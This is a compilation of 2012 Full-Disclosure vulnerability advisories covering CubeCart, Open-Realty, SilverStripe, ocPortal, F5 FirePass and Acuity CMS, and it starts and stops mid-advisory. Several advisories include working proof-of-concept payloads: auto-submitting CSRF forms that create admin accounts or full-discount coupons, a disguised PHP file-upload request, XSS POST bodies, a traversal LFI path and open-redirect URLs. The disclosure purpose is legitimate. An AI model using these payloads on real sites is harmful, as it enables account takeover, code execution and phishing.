form action=http://localhost/admin.php?_g=adminusers/administrators;
method=POST enctype=multipart/form-data
  input type=hidden name=name value=hacker /
  input type=hidden name=adminUsername value=hacker /
  input type=hidden name=email value=hacker#64;yehg#46;net /
  input type=hidden name=adminPassword value=h#64;ck3er /
  input type=hidden name=adminPassword#95;verify
value=h#64;ck3er /
  input type=hidden name=isSuper value=#45; /
  input type=hidden name=notes value=#13; /
  input type=hidden name=adminId value=#13; /
  input type=hidden name=Submit value=Add#32;User /
  input type=submit value=Submit form /
/form

Add Coupon
==
form action=http://localhost/admin.php?_g=products/coupons; method=POST
  input type=hidden name=code value=HACKER /
  input type=hidden name=discount#95;percent value=100 /
  input type=hidden name=discount#95;price value= /
  input type=hidden name=expires value=3000#47;12#47;30 /
  input type=hidden name=allowed#95;uses value=0 /
  input type=hidden name=count value=0 /
  input type=hidden name=desc value=0 /
  input type=hidden name=id value= /
  input type=hidden name=Submit value=Edit#32;Coupon /
  input type=submit value=Submit form /
/form



6. SOLUTION

The CubeCart 4.x version family is no longer maintained by the vendor.
Upgrade to the currently supported latest CubeCart version - 5.x.


7. VENDOR

CubeCart Development Team
http://cubecart.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-12-22: CubeCart 4.x in End-of-Support/Maintenance circle
2012-12-24: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bcubecart_4.4.6%5D_csrf
CubeCart Home Page: http://cubecart.com/
CubeCart Bug-Fix Announcement:
http://forums.cubecart.com/topic/45456-cubecart-447-released/

#yehg [2012-12-24]

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] CubeCart 4.4.6 and lower | Local File Inclusion Vulnerability

2012-12-24 Thread YGN Ethical Hacker Group
1. OVERVIEW

CubeCart 4.4.6 and lower versions are vulnerable to Local File Inclusion.


2. BACKGROUND

CubeCart is an out of the box ecommerce shopping cart software
solution which has been written to run on servers that have PHP 
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.


3. VULNERABILITY DESCRIPTION

CubeCart 4.4.6 and lower versions contain a flaw that may allow a
remote attacker to execute arbitrary commands or code. The issue is
due to the '/admin.php' script not properly sanitizing user input,
specifically directory traversal style attacks (e.g., ../../) supplied
to the 'loc' parameter. This may allow an attacker to include a file
from the targeted host that contains arbitrary commands or code that
will be executed by the vulnerable script. Such attacks are limited
due to the script only calling files already on the target host. In
addition, this flaw can potentially be used to disclose the contents
of any file on the system accessible by the web server.


4. VERSIONS AFFECTED

4.4.6 and lower


5. Affected URL and Parameter

/admin.php (loc parameter)
/admin.php?_g=filemanager/languageloc=/../../../public_ftp/uploads/hack.inc.php


6. SOLUTION

The CubeCart 4.x version family is no longer maintained by the vendor.
Upgrade to the currently supported latest CubeCart version - 5.x.


7. VENDOR

CubeCart Development Team
http://cubecart.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-12-22: CubeCart 4.x in End-of-Support/Maintenance circle
2012-12-24: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bcubecart_4.4.6%5D_lfi
CubeCart Home Page: http://cubecart.com/
CubeCart Bug-Fix Announcement:
http://forums.cubecart.com/topic/45456-cubecart-447-released/
CubeCart4 End-of-Life Announcement:
http://forums.cubecart.com/topic/46765-cubecart-v4-end-of-life-saturday-22-december/

#yehg [2012-12-24]
-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] CubeCart 4.x/5.x | Setup Re-installation Privilege Escalation Vulnerability

2012-12-24 Thread YGN Ethical Hacker Group
1. OVERVIEW

CubeCart 4.x and 5.x versions are vulnerable to Setup Re-installation
Privilege Escalation.

2. BACKGROUND

CubeCart is an out of the box ecommerce shopping cart software
solution which has been written to run on servers that have PHP 
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.

3. VULNERABILITY DESCRIPTION

CubeCart 4.x and 5.x versions contain a flaw that does not remove
set-up installation directory or warn users of the existence of set-up
installation directory.  This allows an attacker to re-install the
application, gain administrator access and do malicious things such as
uploading malicious shell script to compromise the application server.

4. VERSIONS AFFECTED

CubeCart 4.x and 5.x

5. Affected URL

N.A

6. SOLUTION/WORKAROUND

The vendor has chosen not to fix the issue.
Workaround is to remove setup directory after installation.

7. VENDOR

CubeCart Development Team
http://cubecart.com/

8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.

9. DISCLOSURE TIME-LINE

2012-03-24: Vulnerability Reported
2012-12-24: Vulnerability disclosed

10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bcubecart_4x5x%5D_setup_re-install-priv-esclate
CubeCart Home Page: http://cubecart.com/

#yehg [2012-12-24]
-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] CubeCart 4.4.6 and lower | Open URL Redirection Vulnerability

2012-12-24 Thread YGN Ethical Hacker Group
1. OVERVIEW

CubeCart 4.4.6 and lower versions are vulnerable to Open URL Redirection.


2. BACKGROUND

CubeCart is an out of the box ecommerce shopping cart software
solution which has been written to run on servers that have PHP 
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.


3. VULNERABILITY DESCRIPTION

CubeCart 4.4.6 and lower versions contain a flaw that allows a remote
cross site redirection attack. This flaw exists because the
application does not properly sanitise the parameters, r and
redir.  This allows an attacker to create a specially crafted URL,
that if clicked, would redirect a victim from the intended legitimate
web site to an arbitrary web site of the attacker's choice.


4. VERSIONS AFFECTED

4.4.6 and lower


5. Affected URLs and Parameters

/index.php (r parameter)
/index.php (redir parameter)

/index.php?_g=swr=//yehg.net/
/index.php?_a=loginredir=//yehg.net


6. SOLUTION

The CubeCart 4.x version family is no longer maintained by the vendor.
Upgrade to the currently supported latest latest CubeCart version - 5.x.


7. VENDOR

CubeCart Development Team
http://cubecart.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-06-22: CubeCart 4.x in End-of-Support/Maintenance circle
2012-12-24: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bcubecart_4.4.6%5D_open_url_redirection
CubeCart Home Page: http://cubecart.com/
CubeCart Bug-Fix Announcement:
http://forums.cubecart.com/topic/45456-cubecart-447-released/
CubeCart4 End-of-Life Announcement:
http://forums.cubecart.com/topic/46765-cubecart-v4-end-of-life-saturday-22-december/

#yehg [2012-12-24]

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] CubeCart 3.0.20 (3.0.x) and lower | Multiple SQL Injection Vulnerabilities

2012-12-23 Thread YGN Ethical Hacker Group
1. OVERVIEW

The CubeCart 3.0.20 and lower versions are vulnerable to SQL Injection.


2. BACKGROUND

CubeCart is an out of the box ecommerce shopping cart software
solution which has been written to run on servers that have PHP 
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.


3. VULNERABILITY DESCRIPTION

Multiple parameters are not properly sanitized, which allows attacker
to conduct  SQL Injection attack. This could an attacker to inject or
manipulate SQL queries in the back-end database, allowing for the
manipulation or disclosure of arbitrary data.


4. VERSIONS AFFECTED

3.0.20 and lower (aka 3.0.x family)


5. Affected URLs and Parameters

//cube/admin/products/extraCats.php (add parameter)
/cube/admin/products/index.php (cat_id parameter)
/cube/admin/products/index.php (category parameter)
/cube/admin/products/index.php (orderCol parameter)
/cube/admin/products/index.php (orderDir parameter)
/cube/admin/products/options.php (masterProduct parameter)
/cube/admin/settings/currency.php (active parameter)


6. SOLUTION

The CubeCart 3.0.x version family is no longer maintained by the vendor.
Upgrade to the currently supported CubeCart version - 5.x.


7. VENDOR

CubeCart Development Team
http:/cart.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-02-10: CubeCart 3.0.x in End-of-Support/Maintenance circle
2012-12-22: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bcubecart_3.0.20_3.0x%5D_sqli
CubeCart Home Page: http://cubecart.com/


#yehg [2012-12-22]

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] CubeCart 3.0.20 (3.0.x) and lower | Arbitrary File Upload

2012-12-22 Thread YGN Ethical Hacker Group
1. OVERVIEW

CubeCart 3.0.20 and lower versions are vulnerable to Arbitrary File Upload.


2. BACKGROUND

CubeCart is an out of the box ecommerce shopping cart software
solution which has been written to run on servers that have PHP 
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.


3. VULNERABILITY DESCRIPTION

CubeCart 3.0.20 and lower versions contain a flaw related to the
/admin/filemanager/upload.php script's failure to properly validate
uploaded files. This may allow a remote attacker to upload arbitrary
files and execute arbitrary code via a request to the 'atm-regen'
parameter.


4. VERSIONS AFFECTED

3.0.20 and lower (aka 3.0.x family)


5. PROOF-OF-CONCEPT/EXPLOIT

Set content type to image/jpeg and upload.
Uploaded files are stored at images/uploads.


/
POST /cube/admin/filemanager/upload.php HTTP/1.1
Host:localhost
Referer: http://localhost/cube/admin/filemanager/upload.php?custom=1redir=0
Cookie: ccSIDb4c410adddf67168ce2ac0e2807326f8=f2c0bc69b813778a644b76c2b40c7ce0;
Content-Type: multipart/form-data;
boundary=---24464570528145
Content-Length: 29

-24464570528145
Content-Disposition: form-data; name=FCKeditor_File; filename=cmd.php
Content-Type: image/jpeg

?php info();?

-24464570528145
Content-Disposition: form-data; name=submit

Upload Image
-24464570528145
Content-Disposition: form-data; name=redir

0
-24464570528145
Content-Disposition: form-data; name=custom

1
-24464570528145--

///


6. SOLUTION

The CubeCart 3.0.x version family is no longer maintained by the vendor.
Upgrade to the currently supported CubeCart version - 5.x.


7. VENDOR

CubeCart Development Team
http:/cart.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-02-10: CubeCart 3.0.x in End-of-Support/Maintenance circle
2012-12-22: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bcubecart_3.0.20_3.0x%5D_arbitrary_file_upload
CubeCart Home Page: http://cubecart.com/


#yehg [2012-12-22]

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] CubeCart 3.0.20 (3.0.x) and lower | Multiple Cross Site Scripting Vulnerabilities

2012-12-22 Thread YGN Ethical Hacker Group
 (folder parameter)
/admin/modules/gateway/PayOffline/index.php (module parameter)
/admin/modules/gateway/PayPal/index.php (folder parameter)
/admin/modules/gateway/PayPal/index.php (module parameter)
/admin/modules/gateway/Print_Order_Form/index.php   (folder parameter)
/admin/modules/gateway/Print_Order_Form/index.php   (module parameter)
/admin/modules/gateway/Protx/index.php  (folder parameter)
/admin/modules/gateway/Protx/index.php  (module parameter)
/admin/modules/gateway/psiGate/index.php(folder parameter)
/admin/modules/gateway/psiGate/index.php(module parameter)
/admin/modules/gateway/SECPay/index.php (folder parameter)
/admin/modules/gateway/SECPay/index.php (module parameter)
/admin/modules/gateway/VelocityPay/index.php(folder parameter)
/admin/modules/gateway/VelocityPay/index.php(module parameter)
/admin/modules/gateway/Verisign/index.php   (folder parameter)
/admin/modules/gateway/Verisign/index.php   (module parameter)
/admin/modules/shipping/By_Percent/index.php(folder parameter)
/admin/modules/shipping/By_Percent/index.php(module parameter)
/admin/modules/shipping/By_Price/index.php  (folder parameter)
/admin/modules/shipping/By_Price/index.php  (module parameter)
/admin/modules/shipping/By_Weight/index.php (folder parameter)
/admin/modules/shipping/By_Weight/index.php (module parameter)
/admin/modules/shipping/Flat_Rate/index.php (folder parameter)
/admin/modules/shipping/Flat_Rate/index.php (module parameter)
/admin/modules/shipping/Free_Shipping/index.php (folder parameter)
/admin/modules/shipping/Free_Shipping/index.php (module parameter)
/admin/modules/shipping/Per_Category/index.php  (folder parameter)
/admin/modules/shipping/Per_Category/index.php  (module parameter)
/admin/modules/shipping/Per_Item/index.php  (folder parameter)
/admin/modules/shipping/Per_Item/index.php  (module parameter)
/admin/modules/shipping/Royal_Mail/index.php(folder parameter)
/admin/modules/shipping/Royal_Mail/index.php(module parameter)
/admin/products/extraCats.php   (add parameter)
/admin/products/extraCats.php   (name parameter)
/admin/products/index.php   (cat_id parameter)
/admin/products/index.php   (cat_name parameter)
/admin/products/index.php   (category parameter)
/admin/products/index.php   (name parameter)
/admin/products/index.php   (orderCol parameter)
/admin/products/index.php   (orderDir parameter)
/admin/products/index.php   (taxName parameter)
/admin/products/languages.php   (prod_master_id parameter)
/admin/products/options.php (attribute parameter)
/admin/products/options.php (name parameter)
/admin/settings/currency.php(active parameter)
/admin/settings/currency.php(name parameter)
/admin/settings/geo.php (iso parameter)
/admin/settings/geo.php (iso3 parameter)
/admin/settings/geo.php (name parameter)
/admin/settings/geo.php (numcode parameter)
/admin/settings/geo.php (printable_name parameter)
/admin/settings/tax.php (taxName parameter)
/cart.php?act=cart  (HTTP Referer)
/index.php  (add_1 parameter)
/index.php  (add_2 parameter)
/index.php  (county parameter)
/index.php  (firstName parameter)
/index.php  (lastName parameter)
/index.php  (mobile parameter)
/index.php  (town parameter)


6. SOLUTION

The CubeCart 3.0.x version family is no longer maintained by the vendor.
Upgrade to the currently supported CubeCart version - 5.x.


7. VENDOR

CubeCart Development Team
http:/cart.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-02-10: CubeCart 3.0.x in End-of-Support/Maintenance circle
2012-12-22: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bcubecart_3.0.20_3.0x%5D_xss
CubeCart Home Page: http://cubecart.com/


#yehg [2012-12-22]

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Open-Realty CMS 2.5.8 (2.x.x) = Cross Site Request Forgery (CSRF) Vulnerability

2012-11-19 Thread YGN Ethical Hacker Group
1. OVERVIEW

Open-Realty 2.5.8 and lower versions are vulnerable to Cross Site
Request Forgery.


2. BACKGROUND

Open-Realty is the world's leading real estate listing marketing and
management CMS application, and has enjoyed being the real estate web
site software of choice for professional web site developers since
2002.


3. VULNERABILITY DESCRIPTION

Open-Realty 2.5.8 and lower versions contain a flaw that allows a
remote Cross-site Request Forgery (CSRF / XSRF) attack. The flaw
exists because the application does not require multiple steps or
explicit confirmation for sensitive transactions for majority of
administrator functions such as adding new user, assigning user to
administrative privilege. By using a crafted URL, an attacker may
trick the victim into visiting to his web page to take advantage of
the trust relationship between the authenticated victim and the
application. Such an attack could trick the victim into executing
arbitrary commands in the context of their session with the
application, without further prompting or verification.


4. VERSIONS AFFECTED

2.5.8 (2.x.x) =


5. PROOF-OF-CONCEPT/EXPLOIT

 !-- Add Admin User --
 form action=http://localhost/orealty/admin/index.php?action=user_manager;
method=POST
  input type=hidden name=action value=createNewUser /
  input type=hidden name=edit#95;user#95;name value=user /
  input type=hidden name=edit#95;user#95;pass value=pa55w0rd /
  input type=hidden name=edit#95;user#95;pass2 value=pa55w0rd /
  input type=hidden name=user#95;first#95;name value=hacker /
  input type=hidden name=user#95;last#95;name value=smith /
  input type=hidden name=user#95;email
value=hacker#64;yehg#46;net /
  input type=hidden name=edit#95;active value=yes /
  input type=hidden name=edit#95;isAdmin value=yes /
  input type=hidden name=edit#95;isAgent value=yes /
  input type=hidden name=limitListings value=#45;1 /
  input type=hidden name=edit#95;limitFeaturedListings
value=#45;1 /
  input type=hidden name=edit#95;userRank value=0 /
  input type=hidden name=edit#95;canEditAllListings value=yes /
  input type=hidden name=edit#95;canEditAllUsers value=yes /
  input type=hidden name=edit#95;canEditSiteConfig value=yes /
  input type=hidden name=edit#95;canEditMemberTemplate value=yes /
  input type=hidden name=edit#95;canEditAgentTemplate value=yes /
  input type=hidden name=edit#95;canEditPropertyClasses value=yes /
  input type=hidden name=edit#95;canEditListingTemplate value=yes /
  input type=hidden name=edit#95;canViewLogs value=yes /
  input type=hidden name=edit#95;canModerate value=yes /
  input type=hidden name=edit#95;canFeatureListings value=yes /
  input type=hidden name=edit#95;canEditListingExpiration
value=yes /
  input type=hidden name=edit#95;canExportListings value=no /
  input type=hidden name=edit#95;canPages value=yes /
  input type=hidden name=edit#95;canVtour value=yes /
  input type=hidden name=edit#95;canFiles value=yes /
  input type=hidden name=edit#95;canUserFiles value=yes /
  input type=hidden name=edit#95;canManageAddons value=yes /
  scriptdocument.forms[0].submit()/script
/form


6. SOLUTION

The vendor has been reported to have discontinued this product and
therefore has no patch or upgrade that mitigates this problem.
It is recommended that an alternate software package be used in its place.


7. VENDOR

Transparent Technologies Inc.
http://www.transparent-support.com


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-03-05: Open-Realty 2.5.8 in End-of-Support/Maintenance circle
2012-11-17: Vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bopen-realty_2.5.8_2.x%5D_csrf
Open-Realty Home Page: http://www.open-realty.org/


#yehg [2012-11-17]

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] F5 FirePass SSL VPN 4xxx Series | Arbitrary URL Redirection

2012-10-21 Thread YGN Ethical Hacker Group
1. OVERVIEW

F5 FirePass SSL VPN is vulnerable to Open URL Redirection.


2. BACKGROUND

F5 FirePass SSL VPN provides secure remote access to enterprise
applications and data for users over any device or network while
protecting your corporate. (See
http://www.f5.com/pdf/products/firepass-overview.pdf)


3. VULNERABILITY DESCRIPTION

F5 FirePass SSL VPN contains a flaw that allows a remote cross site
redirection attack. This flaw exists because the application does not
validate the refreshURL parameter upon submission to the
my.activation.cns.php3 script. This could allow a user to create a
specially crafted URL, that if clicked, would redirect a victim from
the intended legitimate web site to an arbitrary web site of the
attacker's choosing.


4. VERSIONS AFFECTED

4xxx Series


5. PROOF-OF-CONCEPT/EXPLOIT

https://[VPN_HOST]/my.activation.cns.php3?langchar=ui_translation=refreshURL=http://yehg.net/


6. SOLUTION

We have not been informed of the fix.
We believe this issue should be fixed by the time of releasing our advisory.


7. VENDOR

F5 Networks, Inc.


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-03-31: notified vendor
2012-04-04: vendor acknowledged
2012-10-20: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5BF5_firepass4x%5D_url_redirection
OWASP Top 10 2010 - A 10:
http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards
SANS Top 25 - Rank 23: http://cwe.mitre.org/top25/#CWE-601
CWE-601: http://cwe.mitre.org/data/definitions/601.html

#yehg [2012-10-20]


-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] SilverStripe CMS 2.4.7 = Arbitrary URL Redirection

2012-10-15 Thread YGN Ethical Hacker Group
1. OVERVIEW

SilverStripe 2.4.7 and lower versions are vulnerable to Open URL Redirection.


2. BACKGROUND

SilverStripe CMS is easy for both developers and content authors to
work with. The SilverStripe Framework keeps the code tucked away
neatly so that it can be accessed easily by programmers but does not
get in the way of content authors.


3. VULNERABILITY DESCRIPTION

SilverStripe CMS contains a flaw that allows a remote cross site
redirection attack. This flaw exists because the application does not
validate the BackURL parameter upon submission to the
/index.php/Security/login script. This could allow a user to create
a specially crafted URL, that if clicked, would redirect a victim from
the intended legitimate web site to an arbitrary web site of the
attacker's choosing.


4. VERSIONS AFFECTED

Tested on 2.4.7


5. PROOF-OF-CONCEPT/EXPLOIT

http://localhost/index.php/Security/login?BackURL=//yehg.net


6. SOLUTION

Upgrade to the latest 3.x version.


7. VENDOR

SilverStripe Development Team
http://www.silverstripe.org/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-02-06: notified vendor
2012-10-15: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5BSilverStripe_2.4.7%5D_url_redirection

#yehg [2012-10-15]

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] SilverStripe CMS 2.4.7 = Persistent Cross Site Scripting Vulnerability

2012-10-15 Thread YGN Ethical Hacker Group
1. OVERVIEW

SilverStripe 2.4.7 and lower versions are vulnerable to Persistent
Cross Site Scripting.


2. BACKGROUND

SilverStripe CMS is easy for both developers and content authors to
work with. The SilverStripe Framework keeps the code tucked away
neatly so that it can be accessed easily by programmers but does not
get in the way of content authors.


3. VULNERABILITY DESCRIPTION

The Title parameter was not properly sanitized upon submission to
/index.php/admin/security/EditForm/field/Roles/AddForm and
/index.php/admin/RootForm urls, which allows attacker to conduct
Cross Site Scripting attack. This may allow an attacker to create a
specially crafted URL that would execute arbitrary script code in a
victim's browser.


4. VERSIONS AFFECTED

Tested on 2.4.7


5. PROOF-OF-CONCEPT/EXPLOIT


POST /index.php/admin/security/EditForm/field/Roles/AddForm?SecurityID=[ID]
HTTP/1.1
Host: localhost
Referer: 
http://localhost/index.php/admin/security/EditForm/field/Roles/add?SecurityID=[ID]
Cookie: PHPSESSID=1e4ea938f83b04bc826231987cedc050;
Content-Type: application/x-www-form-urlencoded
Content-Length: 146

Title=%27%22%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3Ectf%5BClassName%5D=PermissionRoleSecurityID=[ID]action_saveComplexTableField=Save


POST /index.php/admin/RootForm HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.4.0_rc3
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Referer: http://localhost/index.php/admin/
Content-Length: 256
Cookie: PHPSESSID=25c8f4060c398d05732fe494eb3ad4f1;
Pragma: no-cache
Cache-Control: no-cache

Title='%22%3E%3Cscript%3Ealert(%2Fxss1%2F)%3C%2Fscript%3ETagline=testCanViewType=AnyoneViewerGroups=CanEditType=LoggedInUsersEditorGroups=CanCreateTopLevelType=LoggedInUsersCreateTopLevelGroups=SecurityID=[ID]Theme=ajax=0action_save_siteconfig=1



6. SOLUTION

Upgrade to the latest 3.x version.


7. VENDOR

SilverStripe Development Team
http://www.silverstripe.org/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-02-06: notified vendor
2012-10-15: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5BSilverStripe_2.4.7%5D_xss


#yehg [2012-10-15]

-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] ocPoral CMS 8.x | Session Hijacking Vulnerability

2012-08-20 Thread YGN Ethical Hacker Group
1. OVERVIEW

ocPoral CMS 8.x and lower versions are vulnerable to Session Hijacking
flaw which could allow attackers to compromise administrator session.


2. PRODUCT DESCRIPTION

ocPortal is the website Content Management System (a CMS) for building
and maintaining a dynamic website. ocPortal's powerful feature-set
means there's always a way to accomplish your vision. Not only does
ocPortal's CMS have all the features you'd expect: for instance photo
galleries, news, file downloads and community forums/chats, but it
does so whilst meeting the highest accessibility and professional
standards. It is also smart enough to go beyond page management, to
automatically handle search engine optimisation, and provide
aggressive hack attack prevention.


3. VULNERABILITY DESCRIPTION

The ocPoral CMS generates 7-digit session IDs for logged-in users;
thus it is possible to work out a valid session ID through brute
forcing. Successful hijacking requires the Enforce IP addresses for
sessions option be disabled. However, when a user's IP is highly
dynamic, this option will likely to be disabled as it would invalidate
logged-in sessions. In other way, if a user and an attacker happened
to be within the same subnet, the attack would succeed regardless of
the Enforce IP setting turning on.


4. VERSIONS AFFECTED

Tested on version 8.1.2


5. PROOF-OF-CONCEPT/EXPLOIT

sample session cookie: ocp_session=8711789


6. SOLUTION

No fix is available as of 2012-08-19.
Workaround is to set enabled for the option, Enforce IP addresses for
sessions.


7. VENDOR

ocPortal Development Team
http://www.ocportal.com/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-07-29: notified vendor, vendor did not plan to release fix
because of default deployed workaround
2012-08-19: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/2wire/%5Bocportal_8x%5D_session_hijacking_vulnerability


#yehg [2012-08-19]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] ocPortal 7.1.5 = | Open URL Redirection Vulnerability

2012-07-28 Thread YGN Ethical Hacker Group
1. OVERVIEW

ocPoral CMS 7.1.5 and lower versions are vulnerable to Open URL Redirection.


2. BACKGROUND

ocPortal is the website Content Management System (a CMS) for building
and maintaining a dynamic website. ocPortal's powerful feature-set
means there's always a way to accomplish your vision. Not only does
ocPortal's CMS have all the features you'd expect: for instance photo
galleries, news, file downloads and community forums/chats, but it
does so whilst meeting the highest accessibility and professional
standards. It is also smart enough to go beyond page management, to
automatically handle search engine optimisation, and provide
aggressive hack attack prevention.


3. VULNERABILITY DESCRIPTION

ocPoral CMS 7.1.5 and lower versions contain a flaw that allows a
remote cross site redirection attack. This flaw exists because the
application does not properly sanitise the redirect parameter.  This
allows an attacker to create a specially crafted URL, that if clicked,
would redirect a victim from the intended legitimate web site to an
arbitrary web site of the attacker's choice.


4. VERSIONS AFFECTED

Tested on 7.1.5


5. PROOF-OF-CONCEPT/EXPLOIT

http://localhost/ocportal/index.php?page=logintype=miscredirect=http://attacker.in


6. SOLUTION

Upgrade to the latest version.


7. VENDOR

ocPortal Development Team
http://www.ocportal.com/


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-03-06: notified vendor
2012-03-21: patched version,7.1.6, released
2012-07-29: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bocportal_7x%5D_open_url_redirection


#yehg [2012-07-29]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Acuity CMS 2.6.x = Arbitrary File Upload

2012-05-20 Thread YGN Ethical Hacker Group
1. OVERVIEW

Acuity CMS 2.6.x (ASP-based) versions are vulnerable to Arbitrary File Upload.


2. BACKGROUND

Acuity CMS is a powerful but simple, extremely easy to use, low
priced, easy to deploy content management system. It is a leader in
its price and feature class.


3. VULNERABILITY DESCRIPTION

